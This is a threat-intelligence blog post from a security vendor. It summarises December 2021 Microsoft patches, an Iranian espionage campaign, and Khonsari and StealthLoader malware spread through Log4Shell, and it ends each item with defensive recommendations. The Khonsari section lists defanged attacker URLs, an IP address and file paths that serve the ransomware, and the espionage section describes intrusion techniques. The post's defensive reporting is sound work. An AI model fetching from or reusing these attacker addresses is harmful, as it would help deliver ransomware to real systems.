Top Middle East Cyber Threats – 27 December 2021

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

Microsoft December Patch Addresses 67 Vulnerabilities

On 15 December 2021, Microsoft issued fixes for 67 vulnerabilities in a variety of products in its security release, including a fix for Windows Defender for IoT, which is vulnerable to CVE-2021-44228 and seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). The only vulnerability noted as being exploited in the wild in this month’s release is CVE-2021-43890 (CVSS score of 7.1), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has clearly been used in Emotet malware campaigns.

This round of fixes also includes CVE-2021-43883, a Windows Installer privilege escalation bug that appears to affect all supported versions of Windows.

The critical vulnerabilities addressed in December 2021 are as follows:

• CVE-2021-43215
• CVE-2021-43899
• CVE-2021-42310
• CVE-2021-43905
• CVE-2021-43233
• CVE-2021-43907
• CVE-2021-43217

This month’s “Critical” rated CVEs include several RCE flaws. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the significant risk posed by the majority of vulnerable Log4Shell implementations, administrators should prioritize patches for any products affected by CVE-2021-44228.

RECOMMENDATIONS

• Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
• Review the fix for CVE-2021-43883 despite its lower severity rating.
• Review the December 2021 “Release Notes” and “Deployment Information” for more details and apply the necessary patches as soon as possible.

Iran Backed Espionage Campaign Targets Middle East and Asia

Seedworm, also known as MERCURY and Static Kitten, is an adversary that has been recently discovered targeting the Middle East again. The threat actor targeted numerous organizations in Israel, Jordan, Kuwait, Laos, Pakistan, Saudi Arabia, Thailand, and the United Arab Emirates as part of the latest effort, which security experts have been following for the past six months.

These attacks used legitimate tools, living-off-the-land tactics, and publicly available malware samples, but security experts believe the campaign was orchestrated by an Iranian state-sponsored threat actor. Following initial breach, the attackers would seek to steal credentials and undertake lateral movement, focusing primarily on the deployment of webshells into Exchange Servers. In some cases, compromised settings were used to launch attacks on other organizations, while others were targeted to carry out supply-chain-style attacks on other victims.

In most cases, the initial infection vector is unclear, although one target appears to have been infected by a malicious MSI file provided in an archive that was presumably attached to a spear-phishing email. Windows Script File (WSF) files were utilized for reconnaissance and command execution in an attack on a telecom’s services provider, and Certutil was used to deploy a tunneling tool, launch WMI, and then download and run a webshell on an Exchange Server. The adversary relied heavily on scripts, some of which were intended to automate data gathering operations, but it also had to use a remote access tool to run a Local Security Authority Subsystem Service (LSASS) dumping tool, deliver tunneling tools, and request a URL from another compromised environment.

RECOMMENDATIONS

• Make efforts to increase visibility through endpoint detection, response, and logging. Endpoint monitoring tools are critical for detecting suspicious activity in an environment after other controls have been circumvented.
• Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
• Ensure that systems are correctly configured and that the security features are enabled.
• Develop risk management and cyber hygiene practices for third parties or managed service providers (MSPs) that your organization relies on.
• Use multi factor authentication (MFA) for all services, especially webmail, virtual private networks, and accounts that access critical systems, to the extent possible.
• Block the indicators of compromise (IoCs) within respective security controls organization wide.

Khonsari Ransomware Deployed by the Log4Shell Vulnerability

A new ransomware family named Khonsari which targets Windows servers has been recently discovered utilizing Log4shell vulnerability to deploy itself.

The exploit loads the Java bytecode at hxxp://3.145.115[.]94/Main.class via JNDI, which then downloads the Kohnsari ransomware from hxxp://3.145.115[.]94/zambo/groenhuyzen.exe.

The ransomware encrypts files using the AES 128 CBC algorithm and the extension .khonsari will be added.

RECOMMENDATIONS

• Take action by blocking the indicators of compromise (IoCs).
• Refer to the recent advisory shared by Help AG for log4shell vulnerability and apply mitigations steps.
• Ensure that all affected systems are patched and updated to the latest version of log4j.

StealthLoader Malware Uses Log4Shell Vulnerability

In the most recent developments involving the popular log4j vulnerability, researchers discovered a Win32 executable malware known as StealthLoader. This malware is.NET-based and appeared shortly after the Log4j vulnerability was discovered.

Using the log4j vulnerability, the Checkpoint-tracked sample sends a malicious HTTP request to the vulnerable target. The malicious payload downloads a PowerShell script, which starts the malware installation process. The malicious files are hosted on a host somewhere in the United States and distribute a variety of malicious files, including a Linux elf coin miner file and Cobalt Strike.

To avoid detection, this Trojan deploys a variety of evasion techniques while mining coins from the victim’s resources. All relevant functions and file names are obfuscated as part of the malware’s evasion techniques to avoid detection by static analysis mechanisms.

RECOMMENDATIONS

• Make efforts to increase visibility through endpoint detection, response, and logging. Endpoint monitoring tools are critical for detecting suspicious activity in an environment after other controls have been circumvented.
• Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
• Ensure that systems are correctly configured and that the security features are enabled.
• Develop risk management and cyber hygiene practices for third parties or managed service providers (MSPs) that your organization relies on.
• Use multi factor authentication (MFA) for all services, especially webmail, virtual private networks, and accounts that access critical systems, to the extent possible.
• Block the indicators of compromise (IoCs) within respective security controls organization wide.

References:

• https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review
• https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east
• https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/
• https://research.checkpoint.com/2021/stealthloader-malware-leveraging-log4shell/